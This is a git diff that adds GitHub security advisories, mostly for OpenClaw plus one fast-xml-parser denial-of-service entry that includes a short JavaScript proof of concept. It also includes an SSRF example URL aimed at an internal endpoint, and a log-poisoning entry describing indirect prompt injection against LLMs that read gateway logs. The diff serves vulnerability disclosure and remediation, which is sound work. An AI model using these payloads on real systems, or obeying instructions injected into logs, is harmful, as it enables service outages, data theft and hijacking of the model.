.../GHSA-3hmm-3q3p-7x72.json | 3 +- .../GHSA-8x3f-4jvw-ww73.json | 6 +- .../GHSA-fm67-x2fw-2g76.json | 6 +- .../GHSA-j644-xc9q-497g.json | 9 +- .../GHSA-prgg-gmcv-8hj2.json | 3 +- .../GHSA-wmgp-r59p-x29f.json | 3 +- .../GHSA-2gp2-mfg4-q5mv.json | 36 ++++++++ .../GHSA-3mc6-qj9j-9v96.json | 6 +- .../GHSA-3q38-qghq-9hmp.json | 36 ++++++++ .../GHSA-3qr2-wf7p-c9f8.json | 4 +- .../GHSA-3w38-x6jp-8474.json | 36 ++++++++ .../GHSA-4586-432g-jmvg.json | 41 ++++++++++ .../GHSA-4c5g-pgmw-3hxj.json | 52 ++++++++++++ .../GHSA-4rxf-gw9p-prj2.json | 36 ++++++++ .../GHSA-58rc-3q27-grhq.json | 36 ++++++++ .../GHSA-5fc6-h8m7-2wfc.json | 34 ++++++++ .../GHSA-5fpg-jg99-g97m.json | 4 +- .../GHSA-5jg4-px58-ghq6.json | 29 +++++++ .../GHSA-5mcc-f9f9-29w9.json | 36 ++++++++ .../GHSA-5xwj-82gw-46fv.json | 36 ++++++++ .../GHSA-622x-ww28-86h7.json | 15 +++- .../GHSA-65rw-7fc7-g478.json | 34 ++++++++ .../GHSA-6j8r-j98h-9g9f.json | 6 +- .../GHSA-6xm9-322m-9c67.json | 3 +- .../GHSA-74jq-6q38-p5wf.json | 34 ++++++++ .../GHSA-7g55-6w4c-27v8.json | 36 ++++++++ .../GHSA-846m-xcgv-cmm3.json | 36 ++++++++ .../GHSA-8rh3-rvv2-3mr4.json | 34 ++++++++ .../GHSA-95x4-2j8q-mf8q.json | 36 ++++++++ .../GHSA-9pq4-hhwq-2hcq.json | 15 +++- .../GHSA-9xgc-j99m-jvr5.json | 3 +- .../GHSA-c56r-fcf4-6rp2.json | 36 ++++++++ .../GHSA-c62m-j9cx-48c8.json | 6 +- .../GHSA-cc8m-46cg-cg54.json | 36 ++++++++ .../GHSA-cxcr-rj95-h6f4.json | 36 ++++++++ .../GHSA-fp2x-rmwp-chww.json | 36 ++++++++ .../GHSA-fpj8-gq4v-p354.json | 31 +++++++ .../GHSA-frcr-mg6p-g499.json | 40 +++++++++ .../GHSA-fvpc-p8pv-qjmp.json | 36 ++++++++ .../GHSA-fwv6-g5vr-pgpx.json | 36 ++++++++ .../GHSA-g268-rwhc-cj9f.json | 33 ++++++++ .../GHSA-g989-fg9h-96pr.json | 6 +- .../GHSA-gpj4-p4vm-jmrr.json | 36 ++++++++ .../GHSA-gr4h-93qx-7636.json | 36 ++++++++ .../GHSA-hf4g-rr9m-7fx6.json | 37 +++++++++ .../GHSA-hp59-976f-xjmx.json | 36 ++++++++ .../GHSA-jwv5-943c-f5wh.json | 3 +- .../GHSA-m2gf-58fp-54j4.json | 6 +- .../GHSA-mgp5-rv84-w37q.json | 31 +++++++ .../GHSA-mrc8-4r2p-q3ww.json | 52 ++++++++++++ .../GHSA-p2vv-8mpq-57x2.json | 3 +- .../GHSA-p2xq-4rwg-xcp7.json | 36 ++++++++ .../GHSA-p937-j3mh-5m6r.json | 33 ++++++++ .../GHSA-p9g6-vwf9-qggv.json | 3 +- .../GHSA-pqh8-xq2x-mwg2.json | 29 +++++++ .../GHSA-qc7g-qpr2-qpjj.json | 36 ++++++++ .../GHSA-qq5r-98hh-rxc9.json | 31 +++++++ .../GHSA-qvhf-98cj-8779.json | 29 +++++++ .../GHSA-qxp9-w6x3-f25v.json | 3 +- .../GHSA-rgxp-2hwp-jwgg.json | 6 +- .../GHSA-rm24-2x6v-8w7f.json | 52 ++++++++++++ .../GHSA-v5g8-2q7f-c524.json | 3 +- .../GHSA-v929-j8mj-vc74.json | 34 ++++++++ .../GHSA-vp3m-qh4p-wg7c.json | 36 ++++++++ .../GHSA-vq48-824m-7qhf.json | 6 +- .../GHSA-vw2m-h749-pv59.json | 36 ++++++++ .../GHSA-w2v5-vxvg-mqgh.json | 15 +++- .../GHSA-w7gq-6p98-xh22.json | 3 +- .../GHSA-wj4m-c5pc-p9r9.json | 36 ++++++++ .../GHSA-wm8j-hgw9-h534.json | 36 ++++++++ .../GHSA-wmq7-3p89-w6h8.json | 4 +- .../GHSA-wrgv-jmfr-c4gr.json | 36 ++++++++ .../GHSA-wrqj-g5w9-qq86.json | 36 ++++++++ .../GHSA-wxpc-f9fq-w9pq.json | 3 +- .../GHSA-x7fc-g3mg-7h5h.json | 36 ++++++++ .../GHSA-xpp8-qpcr-c3rg.json | 6 +- 87 files changed, 2207 insertions(+), 51 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-3m3q-x3gj-f79x/GHSA-3m3q-x3gj-f79x.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-g27f-9qjv-22pm/GHSA-g27f-9qjv-22pm.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-jmr7-xgp7-cmfj/GHSA-jmr7-xgp7-cmfj.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-mv9j-6xhh-g383/GHSA-mv9j-6xhh-g383.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-wfp2-v9c7-fh79/GHSA-wfp2-v9c7-fh79.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2gp2-mfg4-q5mv/GHSA-2gp2-mfg4-q5mv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3q38-qghq-9hmp/GHSA-3q38-qghq-9hmp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3w38-x6jp-8474/GHSA-3w38-x6jp-8474.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4586-432g-jmvg/GHSA-4586-432g-jmvg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4c5g-pgmw-3hxj/GHSA-4c5g-pgmw-3hxj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4rxf-gw9p-prj2/GHSA-4rxf-gw9p-prj2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-58rc-3q27-grhq/GHSA-58rc-3q27-grhq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5jg4-px58-ghq6/GHSA-5jg4-px58-ghq6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5mcc-f9f9-29w9/GHSA-5mcc-f9f9-29w9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5xwj-82gw-46fv/GHSA-5xwj-82gw-46fv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-65rw-7fc7-g478/GHSA-65rw-7fc7-g478.json create mode 100644 advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7g55-6w4c-27v8/GHSA-7g55-6w4c-27v8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-846m-xcgv-cmm3/GHSA-846m-xcgv-cmm3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-95x4-2j8q-mf8q/GHSA-95x4-2j8q-mf8q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cc8m-46cg-cg54/GHSA-cc8m-46cg-cg54.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cxcr-rj95-h6f4/GHSA-cxcr-rj95-h6f4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fp2x-rmwp-chww/GHSA-fp2x-rmwp-chww.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fpj8-gq4v-p354/GHSA-fpj8-gq4v-p354.json create mode 100644 advisories/unreviewed/2026/02/GHSA-frcr-mg6p-g499/GHSA-frcr-mg6p-g499.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fvpc-p8pv-qjmp/GHSA-fvpc-p8pv-qjmp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fwv6-g5vr-pgpx/GHSA-fwv6-g5vr-pgpx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g268-rwhc-cj9f/GHSA-g268-rwhc-cj9f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gpj4-p4vm-jmrr/GHSA-gpj4-p4vm-jmrr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gr4h-93qx-7636/GHSA-gr4h-93qx-7636.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hf4g-rr9m-7fx6/GHSA-hf4g-rr9m-7fx6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hp59-976f-xjmx/GHSA-hp59-976f-xjmx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mgp5-rv84-w37q/GHSA-mgp5-rv84-w37q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mrc8-4r2p-q3ww/GHSA-mrc8-4r2p-q3ww.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p2xq-4rwg-xcp7/GHSA-p2xq-4rwg-xcp7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p937-j3mh-5m6r/GHSA-p937-j3mh-5m6r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qc7g-qpr2-qpjj/GHSA-qc7g-qpr2-qpjj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qq5r-98hh-rxc9/GHSA-qq5r-98hh-rxc9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rm24-2x6v-8w7f/GHSA-rm24-2x6v-8w7f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v929-j8mj-vc74/GHSA-v929-j8mj-vc74.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vp3m-qh4p-wg7c/GHSA-vp3m-qh4p-wg7c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vw2m-h749-pv59/GHSA-vw2m-h749-pv59.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wj4m-c5pc-p9r9/GHSA-wj4m-c5pc-p9r9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wm8j-hgw9-h534/GHSA-wm8j-hgw9-h534.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wrgv-jmfr-c4gr/GHSA-wrgv-jmfr-c4gr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wrqj-g5w9-qq86/GHSA-wrqj-g5w9-qq86.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x7fc-g3mg-7h5h/GHSA-x7fc-g3mg-7h5h.json diff --git a/advisories/github-reviewed/2026/02/GHSA-3m3q-x3gj-f79x/GHSA-3m3q-x3gj-f79x.json b/advisories/github-reviewed/2026/02/GHSA-3m3q-x3gj-f79x/GHSA-3m3q-x3gj-f79x.json new file mode 100644 index 0000000000000..733bb027dc399 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3m3q-x3gj-f79x/GHSA-3m3q-x3gj-f79x.json @@ -0,0 +1,82 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3m3q-x3gj-f79x", + "modified": "2026-02-17T21:31:58Z", + "published": "2026-02-17T21:31:58Z", + "aliases": [], + "summary": "OpenClaw optional voice-call plugin: webhook verification may be bypassed behind certain proxy configurations", + "details": "## Affected Packages / Versions\n\nThis issue affects the optional voice-call plugin only. It is not enabled by default; it only applies to installations where the plugin is installed and enabled.\n\n- Package: `@openclaw/voice-call`\n- Vulnerable versions: `< 2026.2.3`\n- Patched versions: `>= 2026.2.3`\n\nLegacy package name (if you are still using it):\n\n- Package: `@clawdbot/voice-call`\n- Vulnerable versions: `<= 2026.1.24`\n- Patched versions: none published under this package name; migrate to `@openclaw/voice-call`\n\n## Summary\n\nIn certain reverse-proxy / forwarding setups, webhook verification can be bypassed if untrusted forwarded headers are accepted.\n\n## Impact\n\nAn external party may be able to send voice-call webhook requests that are accepted as valid, which can result in spoofed webhook events being processed.\n\n## Root Cause\n\nSome deployments implicitly trusted forwarded headers (for example `Forwarded` / `X-Forwarded-*`) when determining request properties used during webhook verification. If those headers are not overwritten by a trusted proxy, a client can supply them directly and influence verification.\n\n## Resolution\n\nIgnore forwarded headers by default unless explicitly trusted and allowlisted in configuration. Keep any loopback-only development bypass restricted to local development only. Upgrade to a patched version.\n\nIf you cannot upgrade immediately, strip `Forwarded` and `X-Forwarded-*` headers at the edge so clients cannot supply them directly.\n\n## Fix Commit(s)\n\n- `a749db9820eb6d6224032a5a34223d286d2dcc2f`\n\n## Credits\n\nThanks `@0x5t` for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@openclaw/voice-call" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "@clawdbot/voice-call" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2026.1.24" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3m3q-x3gj-f79x" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/a749db9820eb6d6224032a5a34223d286d2dcc2f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:31:58Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-g27f-9qjv-22pm/GHSA-g27f-9qjv-22pm.json b/advisories/github-reviewed/2026/02/GHSA-g27f-9qjv-22pm/GHSA-g27f-9qjv-22pm.json new file mode 100644 index 0000000000000..1bbefe9673966 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-g27f-9qjv-22pm/GHSA-g27f-9qjv-22pm.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g27f-9qjv-22pm", + "modified": "2026-02-17T21:31:39Z", + "published": "2026-02-17T21:31:39Z", + "aliases": [], + "summary": "OpenClaw log poisoning (indirect prompt injection) via WebSocket headers", + "details": "### Summary\nIn `openclaw` versions prior to `2026.2.13`, OpenClaw logged certain WebSocket request headers (including `Origin` and `User-Agent`) without neutralization or length limits on the \"closed before connect\" path.\n\nIf an unauthenticated client can reach the gateway and send crafted header values, those values may be written into core logs. Under workflows where logs are later read or interpreted by an LLM (for example via AI-assisted debugging), this can increase the risk of indirect prompt injection (log poisoning).\n\n### Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `<= 2026.2.12`\n- Fixed: `>= 2026.2.13`\n\n### Details\n- Component: `src/gateway/server/ws-connection.ts`\n- Trigger: WebSocket connection closes before completing the connect/handshake; header values are included in the log message and structured context.\n\n### Impact\nThis issue is primarily an indirect prompt injection risk and depends on downstream log consumption behavior. If you do not feed logs into an LLM or other automation, impact is limited.\n\n### Fix\nHeader values written to gateway logs are now sanitized and truncated (including removal of control/format characters and length limiting).\n- Fix commits: `d637a263505448bf4505b85535babbfaacedbaac`, `e84318e4bcdc948d92e57fda1eb763a65e1774f0` (PR #15592)\n\n### Workarounds\n- Upgrade to `openclaw@2026.2.13` or later.\n- Treat logs as untrusted input when using AI-assisted debugging (sanitize/escape, and do not auto-execute instructions derived from logs).\n- Restrict gateway network exposure; apply reverse-proxy limits on header size where applicable.\n\nThanks @pkerkhofs for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g27f-9qjv-22pm" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/15592" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/d637a263505448bf4505b85535babbfaacedbaac" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.13" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-117" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:31:39Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-jmr7-xgp7-cmfj/GHSA-jmr7-xgp7-cmfj.json b/advisories/github-reviewed/2026/02/GHSA-jmr7-xgp7-cmfj/GHSA-jmr7-xgp7-cmfj.json new file mode 100644 index 0000000000000..bc6d8ff3bb5e0 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-jmr7-xgp7-cmfj/GHSA-jmr7-xgp7-cmfj.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jmr7-xgp7-cmfj", + "modified": "2026-02-17T21:30:10Z", + "published": "2026-02-17T21:30:10Z", + "aliases": [ + "CVE-2026-26278" + ], + "summary": "fast-xml-parser affected by DoS through entity expansion in DOCTYPE (no expansion limit)", + "details": "### Summary\nThe XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application.\n\n### Details\nThere is a check in `DocTypeReader.js` that tries to prevent entity expansion attacks by rejecting entities that reference other entities (it looks for & inside entity values). This does stop classic “Billion Laughs” payloads.\n\nHowever, it doesn’t stop a much simpler variant.\n\nIf you define one large entity that contains only raw text (no & characters) and then reference it many times, the parser will happily expand it every time. There is no limit on how large the expanded result can become, or how many replacements are allowed.\n\nThe problem is in `replaceEntitiesValue()` inside `OrderedObjParser.js`. It repeatedly runs `val.replace()` in a loop, without any checks on total output size or execution cost. As the entity grows or the number of references increases, parsing time explodes.\n\nRelevant code:\n\n`DocTypeReader.js` (lines 28–33): entity registration only checks for &\n\n`OrderedObjParser.js` (lines 439–458): entity replacement loop with no limits\n\n### PoC\n\n```js\nconst { XMLParser } = require('fast-xml-parser');\n\nconst entity = 'A'.repeat(1000);\nconst refs = '&big;'.repeat(100);\nconst xml = `]>${refs}`;\n\nconsole.time('parse');\nnew XMLParser().parse(xml); // ~4–8 seconds for ~1.3 KB of XML\nconsole.timeEnd('parse');\n\n// 5,000 chars × 100 refs takes 200+ seconds\n// 50,000 chars × 1,000 refs will hang indefinitely\n```\n\n### Impact\nThis is a straightforward denial-of-service issue.\n\nAny service that parses user-supplied XML using the default configuration is vulnerable. Since Node.js runs on a single thread, the moment the parser starts expanding entities, the event loop is blocked. While this is happening, the server can’t handle any other requests.\n\nIn testing, a payload of only a few kilobytes was enough to make a simple HTTP server completely unresponsive for several minutes, with all other requests timing out.\n\n### Workaround\n\nAvoid using DOCTYPE parsing by `processEntities: false` option.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "fast-xml-parser" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.3" + }, + { + "fixed": "5.3.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj" + }, + { + "type": "WEB", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77" + }, + { + "type": "PACKAGE", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser" + }, + { + "type": "WEB", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-776" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:30:10Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-mv9j-6xhh-g383/GHSA-mv9j-6xhh-g383.json b/advisories/github-reviewed/2026/02/GHSA-mv9j-6xhh-g383/GHSA-mv9j-6xhh-g383.json new file mode 100644 index 0000000000000..71925776dcba5 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-mv9j-6xhh-g383/GHSA-mv9j-6xhh-g383.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mv9j-6xhh-g383", + "modified": "2026-02-17T21:31:17Z", + "published": "2026-02-17T21:31:17Z", + "aliases": [], + "summary": "OpenClaw's unauthenticated Nostr profile HTTP endpoints allow remote profile/config tampering", + "details": "## Summary\nThe OpenClaw Nostr channel plugin (optional, disabled by default, installed separately) exposes profile management HTTP endpoints under `/api/channels/nostr/:accountId/profile` (GET/PUT) and `/api/channels/nostr/:accountId/profile/import` (POST). In affected versions, these routes were dispatched via the gateway plugin HTTP layer without requiring gateway authentication, allowing unauthenticated remote callers to read or mutate the Nostr profile and persist changes to the gateway config. Profile updates are also published as a signed Nostr kind:0 event using the bot's private key.\n\nDeployments that do not have the Nostr plugin installed and enabled are not impacted.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.9`\n- Fixed versions: `>= 2026.2.12`\n- Scope note: only affects deployments with the optional `@openclaw/nostr` plugin installed and enabled\n\n## Details\nThis is exploitable when the gateway HTTP port is reachable beyond localhost (for example: bound to `0.0.0.0`, exposed on a LAN, behind a reverse proxy, or via Tailscale Funnel/Serve).\n\nUnauthenticated callers could update the Nostr profile and persist the new profile in the gateway config.\n\n## Mitigation\nUpgrade to `openclaw` `2026.2.12` or later.\n\nAs a temporary mitigation, restrict gateway HTTP exposure (bind loopback-only and/or enforce network-layer access controls) until upgraded.\n\n## Fix\nGateway now requires gateway authentication for plugin HTTP requests under `/api/channels/*` before dispatching to plugin handlers.\n\nFix commit(s):\n- 647d929c9d0fd114249230d939a5cb3b36dc70e7\n\nThanks @simecek for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mv9j-6xhh-g383" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/647d929c9d0fd114249230d939a5cb3b36dc70e7" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.12" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285", + "CWE-306" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:31:17Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-wfp2-v9c7-fh79/GHSA-wfp2-v9c7-fh79.json b/advisories/github-reviewed/2026/02/GHSA-wfp2-v9c7-fh79/GHSA-wfp2-v9c7-fh79.json new file mode 100644 index 0000000000000..a9811b9f8b51d --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-wfp2-v9c7-fh79/GHSA-wfp2-v9c7-fh79.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfp2-v9c7-fh79", + "modified": "2026-02-17T21:30:48Z", + "published": "2026-02-17T21:30:48Z", + "aliases": [], + "summary": "OpenClaw affected by SSRF via attachment/media URL hydration", + "details": "### Summary\n\nVersions of the `openclaw` npm package prior to `2026.2.2` could be coerced into fetching arbitrary `http(s)` URLs during attachment/media hydration. An attacker who can influence the media URL (for example via model-controlled `sendAttachment` or auto-reply media URLs) could trigger SSRF to internal resources and exfiltrate the fetched bytes as an outbound attachment.\n\n### Plain-English Explanation\n\nOpenClaw can send files by downloading them first.\n\nOn vulnerable versions (`< 2026.2.2`), if an attacker could get OpenClaw to treat a URL as the “file to attach”, OpenClaw would download that URL from the gateway machine and then send the downloaded bytes back out as an attachment.\n\nThat matters because the gateway can often reach internal-only endpoints that an attacker cannot (for example `127.0.0.1` services, private RFC1918 addresses, or cloud metadata endpoints). This is a data-leak risk.\n\nThis does not directly grant code execution or shell access; it is about making the gateway perform HTTP requests and returning the response bytes.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `< 2026.2.2`\n- Fixed: `>= 2026.2.2`\n\nRelease timeline (npm):\n\n- `2026.2.1` published `2026-02-02T11:45:27Z`\n- `2026.2.2` published `2026-02-04T00:56:41Z`\n- This advisory was created `2026-02-05T10:42:26Z`\n\n### Details\n\nIn affected versions, remote media fetching performed a raw `fetch(url)` without SSRF protections.\n\nStarting in `2026.2.2`, remote media fetching is guarded by SSRF checks (private/loopback/link-local blocking, DNS pinning, and redirect handling), so attempts to fetch `127.0.0.1`, private RFC1918 space, or cloud metadata hostnames are rejected.\n\n### Proof of Concept\n\nFrom any context where an attacker can influence an attachment/media URL, provide a media URL targeting an internal endpoint (example: `http://127.0.0.1:9999/secret.txt`).\n\nOn vulnerable versions (`< 2026.2.2`), the gateway fetches the URL and uses the response bytes as the attachment payload.\n\n### Fix\n\nFix commits:\n\n- `81c68f582d4a9a20d9cca9f367d2da9edc5a65ae`\n- `9bd64c8a1f91dda602afc1d5246a2ff2be164647`\n\n### Mitigation\n\nUpgrade to `openclaw >= 2026.2.2`.\n\nThanks @simecek for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wfp2-v9c7-fh79" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/81c68f582d4a9a20d9cca9f367d2da9edc5a65ae" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/9bd64c8a1f91dda602afc1d5246a2ff2be164647" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:30:48Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-h58h-8g45-v677/GHSA-h58h-8g45-v677.json b/advisories/unreviewed/2022/05/GHSA-h58h-8g45-v677/GHSA-h58h-8g45-v677.json index 9c4b708bc7a42..e7664232f6c12 100644 --- a/advisories/unreviewed/2022/05/GHSA-h58h-8g45-v677/GHSA-h58h-8g45-v677.json +++ b/advisories/unreviewed/2022/05/GHSA-h58h-8g45-v677/GHSA-h58h-8g45-v677.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h58h-8g45-v677", - "modified": "2022-05-01T23:27:17Z", + "modified": "2026-02-17T21:31:12Z", "published": "2022-05-01T23:27:17Z", "aliases": [ "CVE-2008-0015" ], "details": "Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in the wild in July 2009, aka \"Microsoft Video ActiveX Control Vulnerability.\"", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -34,6 +39,10 @@ "type": "WEB", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7436" }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2008-0015" + }, { "type": "WEB", "url": "http://blogs.technet.com/srd/archive/2009/08/11/ms09-037-why-we-are-using-cve-s-already-used-in-ms09-035.aspx" @@ -97,7 +106,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-121" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-qfxw-56c6-7pjg/GHSA-qfxw-56c6-7pjg.json 